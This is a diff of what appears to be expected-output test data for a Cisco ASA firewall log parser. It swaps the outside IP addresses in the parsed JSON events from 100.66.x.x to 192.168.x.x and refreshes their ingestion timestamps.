@@ -14593,8 +14593,8 @@ }, "destination": { "port": 8301, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1297, @@ -14634,7 +14634,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14642,8 +14642,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168052200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301", + "ingested": "2021-12-09T13:33:41.995815600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14676,8 +14676,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14712,7 +14712,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14721,8 +14721,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168057700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", + "ingested": "2021-12-09T13:33:41.995821900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -14738,7 +14738,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11831", "source_interface": "outside", "mapped_destination_port": 1297 @@ -14755,8 +14755,8 @@ }, "destination": { "port": 8302, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1298, @@ -14796,7 +14796,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14804,8 +14804,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168064300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302", + "ingested": "2021-12-09T13:33:41.995828200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14838,8 +14838,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14874,7 +14874,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -14883,8 +14883,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168070900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", + "ingested": "2021-12-09T13:33:41.995834400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14900,7 +14900,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11832", "source_interface": "outside", "mapped_destination_port": 1298 @@ -14922,8 +14922,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -14958,7 +14958,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -14967,8 +14967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168078600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995840700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -14984,7 +14984,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.9", + "mapped_source_ip": "192.168.179.9", "connection_id": "11833", "source_interface": "outside", "mapped_destination_port": 56132 @@ -15006,8 +15006,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -15042,7 +15042,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -15052,8 +15052,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.168084Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:33:41.995847Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15090,8 +15090,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15126,7 +15126,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -15137,8 +15137,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168088400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", + "ingested": "2021-12-09T13:33:41.995853100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15170,8 +15170,8 @@ }, "destination": { "port": 8303, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1299, @@ -15211,7 +15211,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15219,8 +15219,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168093400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303", + "ingested": "2021-12-09T13:33:41.995859300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15253,8 +15253,8 @@ }, "source": { "port": 80, - "address": "100.66.247.99", - "ip": "100.66.247.99" + "address": "192.168.247.99", + "ip": "192.168.247.99" }, "tags": [ "preserve_original_event" @@ -15289,7 +15289,7 @@ "localhost" ], "ip": [ - "100.66.247.99", + "192.168.247.99", "172.31.98.44" ] }, 
@@ -15298,8 +15298,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168098600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", + "ingested": "2021-12-09T13:33:41.995865500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15315,7 +15315,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.247.99", + "mapped_source_ip": "192.168.247.99", "connection_id": "11834", "source_interface": "outside", "mapped_destination_port": 1299 @@ -15332,8 +15332,8 @@ }, "destination": { "port": 8304, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1300, @@ -15373,7 +15373,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15381,8 +15381,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168104300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304", + "ingested": "2021-12-09T13:33:41.995871800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15415,8 +15415,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -15451,7 +15451,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15460,8 +15460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168111600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", + "ingested": "2021-12-09T13:33:41.995878100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15477,7 +15477,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11835", "source_interface": "outside", "mapped_destination_port": 1300 @@ -15499,8 +15499,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15535,7 +15535,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15546,8 +15546,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168117500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", + "ingested": "2021-12-09T13:33:41.995884200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -15584,8 +15584,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15620,7 +15620,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15631,8 +15631,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.168124100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", + "ingested": "2021-12-09T13:33:41.995890600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15664,8 +15664,8 @@ }, "destination": { "port": 8305, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1301, @@ -15705,7 +15705,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15713,8 +15713,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168132100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305", + "ingested": "2021-12-09T13:33:41.995898500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15747,8 +15747,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -15783,7 +15783,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15792,8 +15792,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168137300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", + "ingested": "2021-12-09T13:33:41.995905200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15809,7 +15809,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11836", "source_interface": "outside", "mapped_destination_port": 1301 @@ -15826,8 +15826,8 @@ }, "destination": { "port": 8306, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1302, @@ -15867,7 +15867,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15875,8 +15875,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168142500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306", + "ingested": "2021-12-09T13:33:41.995911500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -15909,8 +15909,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15945,7 +15945,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15954,8 +15954,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168148200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", + "ingested": "2021-12-09T13:33:41.995917800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11837", "source_interface": "outside", "mapped_destination_port": 1302 @@ -16009,8 +16009,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168158Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995924400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16056,8 +16056,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168167300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995929600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16103,8 +16103,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168173900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995934900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16150,8 +16150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168178300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995941Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16197,8 +16197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168183900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995946200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16244,8 +16244,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168189100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995950600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16291,8 +16291,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168194200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995955600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16338,8 +16338,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168200400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995961900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16385,8 +16385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168208500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995966600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16432,8 +16432,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168216300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995971600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16479,8 +16479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168224200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995975800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16526,8 +16526,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168231900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995981100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16573,8 +16573,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168240Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995987300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16620,8 +16620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168247800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995993700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16667,8 +16667,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168253700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995999900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16693,8 +16693,8 @@ }, "destination": { "port": 8308, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1304, @@ -16734,7 +16734,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -16742,8 +16742,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168258800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308", + "ingested": "2021-12-09T13:33:41.996006200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -16776,8 +16776,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -16812,7 +16812,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -16821,8 +16821,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.168263900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", + "ingested": "2021-12-09T13:33:41.996012300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -16838,7 +16838,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11840", "source_interface": "outside", "mapped_destination_port": 1304 
